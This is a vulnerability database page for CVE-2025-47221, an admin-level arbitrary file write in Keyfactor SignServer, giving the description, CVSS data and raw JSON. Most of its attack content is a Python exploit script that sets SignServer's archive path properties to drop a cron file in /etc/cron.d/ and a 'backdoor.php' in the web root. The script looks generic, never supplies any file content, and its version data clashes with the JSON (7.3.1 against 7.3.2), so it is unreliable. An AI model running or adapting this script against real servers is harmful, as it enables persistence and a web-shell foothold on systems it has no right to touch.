Security Vulnerability Report
中文
CVE-2025-47221 CVSS 5.3 MEDIUM

CVE-2025-47221

Published: 2025-11-13 21:15:50
Last Modified: 2025-12-17 20:15:55
Source: [email protected]

Description

An arbitrary file write was found in Keyfactor SignServer versions prior to 7.3.2. The properties ARCHIVETODISK_FILENAME-PATTERN, ARCHIVETODISK_PATH_BASE, ARCHIVETODISK_PATH_PATTERN can be set to any path, even ones that will point to files that already exist. This vulnerability gives a user with admin access the possibility to write files in arbitrary directories in the server file system and potentially overwrite files accessible by the local user JBoss.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:* - VULNERABLE
Keyfactor SignServer < 7.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-47221 PoC - Keyfactor SignServer Arbitrary File Write This PoC demonstrates how an attacker with admin access can exploit the arbitrary file write vulnerability via SignServer configuration. """ import requests import json from requests.auth import HTTPBasicAuth TARGET_URL = "https://target-server:8440/signserver" USERNAME = "admin" PASSWORD = "admin_password" def exploit_arbitrary_file_write(): """ Exploit the arbitrary file write vulnerability by modifying ARCHIVETODISK properties to write to arbitrary paths. """ # Malicious configuration to write arbitrary files malicious_config = { "workerName": "KeyfactorSignServer", "ARCHIVETODISK_PATH_BASE": "/etc/cron.d/", "ARCHIVETODISK_PATH_PATTERN": "/", "ARCHIVETODISK_FILENAME-PATTERN": "malicious_cron" } # Alternative: Overwrite system files system_file_exploit = { "workerName": "KeyfactorSignServer", "ARCHIVETODISK_PATH_BASE": "/var/www/html/", "ARCHIVETODISK_PATH_PATTERN": "/", "ARCHIVETODISK_FILENAME-PATTERN": "backdoor.php" } try: # Login to SignServer admin interface session = requests.Session() auth = HTTPBasicAuth(USERNAME, PASSWORD) # Update configuration with malicious parameters response = session.post( f"{TARGET_URL}/admin/worker", json=malicious_config, auth=auth, verify=False, timeout=30 ) if response.status_code == 200: print("[+] Successfully modified ARCHIVETODISK configuration") print("[+] Arbitrary file write vulnerability triggered") return True else: print(f"[-] Failed to exploit: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False def check_vulnerability(): """ Check if the target SignServer instance is vulnerable. """ try: # Check SignServer version response = requests.get( f"{TARGET_URL}/status", timeout=30 ) if response.status_code == 200: data = response.json() version = data.get("version", "unknown") print(f"[*] Detected SignServer version: {version}") # Check if version is vulnerable (< 7.3.2) version_parts = version.split(".") if len(version_parts) >= 3: major, minor, patch = int(version_parts[0]), int(version_parts[1]), int(version_parts[2]) if major < 7 or (major == 7 and minor < 3) or (major == 7 and minor == 3 and patch < 2): print("[!] Target is VULNERABLE to CVE-2025-47221") return True else: print("[+] Target is NOT vulnerable") return False except Exception as e: print(f"[-] Error checking vulnerability: {e}") return False if __name__ == "__main__": print("CVE-2025-47221 Keyfactor SignServer Arbitrary File Write PoC") print("=" * 60) # Check if target is vulnerable if check_vulnerability(): print("\n[*] Attempting exploitation...") exploit_arbitrary_file_write()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47221", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:49.583", "lastModified": "2025-12-17T20:15:55.133", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file write was found in Keyfactor SignServer versions prior to 7.3.2. The properties ARCHIVETODISK_FILENAME-PATTERN, ARCHIVETODISK_PATH_BASE, ARCHIVETODISK_PATH_PATTERN can be set to any path, even ones that will point to files that already exist. This vulnerability gives a user with admin access the possibility to write files in arbitrary directories in the server file system and potentially overwrite files accessible by the local user JBoss."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.1", "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"}]}]}], "references": [{"url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://support.keyfactor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.keyfactor.com/hc/en-us/articles/37639116791067-SignServer-CVE-2025-47221-Arbitrary-file-write", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.